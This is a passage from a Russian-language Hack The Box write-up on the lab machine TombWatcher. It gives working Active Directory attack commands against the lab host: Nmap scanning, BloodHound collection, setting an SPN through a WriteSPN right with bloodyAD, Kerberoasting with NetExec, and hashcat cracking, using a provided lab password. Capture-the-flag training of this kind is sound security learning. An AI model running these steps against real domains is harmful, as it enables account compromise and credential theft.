В этом рай­тапе я рас­ска­жу, как экс­плу­ати­ровать цепоч­ку раз­решений DACL для прод­вижения в домене. Затем вос­ста­новим из кор­зины Active Directory уда­лен­ный объ­ект и исполь­зуем тех­нику ADCS ESC15 для ком­про­мета­ции домена.

На­ша цель — получе­ние прав супер­поль­зовате­ля на машине TombWatcher с учеб­ной пло­щад­ки Hack The Box. Уро­вень слож­ности — сред­ний.

Разведка

 

Сканирование портов

До­бав­ляем IP-адрес машины в /etc/hosts:

10.10.11.72 tombwatcher.htb

По­мимо IP-адре­са машины, нам пре­дос­тавля­ют учет­ные дан­ные с пра­вами поль­зовате­ля домена.

Информация о машине
Ин­форма­ция о машине

Пер­вым делом запус­каем ска­ниро­вание пор­тов.

Справка: сканирование портов

Ска­ниро­вание пор­тов — стан­дар­тный пер­вый шаг при любой ата­ке. Он поз­воля­ет ата­кующе­му узнать, какие служ­бы на хос­те при­нима­ют соеди­нение. На осно­ве этой информа­ции выбира­ется сле­дующий шаг к получе­нию точ­ки вхо­да.

На­ибо­лее извес­тный инс­тру­мент для ска­ниро­вания — это Nmap. Улуч­шить резуль­таты его работы ты можешь при помощи сле­дующе­го скрип­та:

#!/bin/bash
ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '
' ',' | sed s/,$//)
nmap -p$ports -A $1

Он дей­ству­ет в два эта­па. На пер­вом про­изво­дит­ся обыч­ное быс­трое ска­ниро­вание, на вто­ром — более тща­тель­ное ска­ниро­вание, с исполь­зовани­ем име­ющих­ся скрип­тов (опция -A).

Результат работы скрипта
Ре­зуль­тат работы скрип­та

Ска­нер нашел 13 откры­тых пор­тов:

  • 80 (HTTP) — веб‑сер­вер Microsoft IIS/10.0;
  • 88 — Kerberos;
  • 135 — Microsoft RPC;
  • 139 — служ­ба сеан­сов NetBIOS, NetLogon;
  • 389 — LDAP;
  • 445 — SMB;
  • 464 — служ­ба сме­ны пароля Kerberos;
  • 593 (HTTP-RPC-EPMAP) — исполь­зует­ся в служ­бах DCOM и MS Exchange;
  • 636 — LDAP с шиф­ровани­ем SSL или TLS;
  • 3268 (LDAP) — для дос­тупа к Global Catalog от кли­ента к кон­трол­леру;
  • 3269 (LDAPS) — для дос­тупа к Global Catalog от кли­ента к кон­трол­леру через защищен­ное соеди­нение;
  • 5985 — WinRM;
  • 9389 — веб‑служ­бы AD DS.

Те­перь про­верим выдан­ные учет­ные дан­ные.

nxc smb 10.10.11.72 -u henry -p 'H3nry_987TGV!'
Результат проверки учетных данных
Ре­зуль­тат про­вер­ки учет­ных дан­ных
 

Точка входа

У нас есть дей­ству­ющая учет­ная запись в домене, поэто­му получим спи­сок поль­зовате­лей. Иног­да в опи­сании учет­ных записей мож­но най­ти инте­рес­ную информа­цию.

nxc smb 10.10.11.72 -u henry -p 'H3nry_987TGV!' --users
Список пользователей
Спи­сок поль­зовате­лей

Сох­раня­ем спи­сок поль­зовате­лей в файл на будущее, пос­ле чего собира­ем базу BloodHound.

Справка: BloodHound

Ути­лита BloodHound исполь­зует теорию гра­фов для выяв­ления скры­тых и зачас­тую неп­редна­мерен­ных вза­имос­вязей в сре­де Active Directory. Ее мож­но исполь­зовать, что­бы лег­ко иден­тифици­ровать очень слож­ные пути ата­ки. Помимо самой ути­литы, которая поз­воля­ет прос­матри­вать граф, сущес­тву­ет часть, заг­ружа­емая на уда­лен­ный хост для сбо­ра информа­ции. Она быва­ет в вер­сиях для раз­ных ОС и на раз­ных язы­ках прог­рамми­рова­ния.

Для сбо­ра базы BloodHound будем исполь­зовать RustHound-CE. Ском­пилиру­ем вер­сию для Windows, заг­рузим на уда­лен­ный хост и запус­тим ска­ниро­вание.

rusthound-ce -d tombwatcher.htb -u henry -p 'H3nry_987TGV!' -i 10.10.11.72 -c All -z
Логи RustHound
Ло­ги RustHound

Дан­ные появят­ся очень быс­тро. Ска­чива­ем ито­говый архив и стро­им граф от поль­зовате­ля henry.

Граф BloodHound
Граф BloodHound

Те­перь прой­дем по все­му пути для получе­ния сес­сии поль­зовате­ля john на сер­вере.

 

Продвижение

Учет­ная запись henry име­ет пра­во WriteSPN на учет­ную запись alfred. Это пра­во поз­воля­ет изме­нить зна­чение атри­бута servicePrincipalName и затем про­извести ата­ку Kerberoasting. Записать ран­домное зна­чение в атри­бут мож­но с помощью bloodyAD.

info

Под­робнее о тех­нике Kerberoasting читай в статье «Ба­зовые ата­ки на AD. Раз­бира­ем Kerberoasting, AS-REP Roasting и LLMNR Poisoning».

bloodyAD --host 10.10.11.72 -d tombwatcher.htb -u henry -p 'H3nry_987TGV!' set object 'ALFRED' servicePrincipalName -v 'test/DC01.tombwatcher.htb'
Запись в атрибут servicePrincipalName
За­пись в атри­бут servicePrincipalName

Те­перь с помощью NetExec про­водим ата­ку Kerberoasting и получа­ем хеш пароля учет­ной записи alfred.

faketime -f '+4h' nxc ldap 10.10.11.72 -d 'tombwatcher.htb' -u henry -p 'H3nry_987TGV!' --kerberoasting out.txt
Результат Kerberoasting
Ре­зуль­тат Kerberoasting

По­лучен­ный хеш лег­ко бру­тит­ся ути­литой hashcat. Так ком­про­мети­руем учет­ную запись alfred.

hashcat -m 13100 hash.txt rockyou.txt
Результат подбора пароля
Ре­зуль­тат под­бора пароля

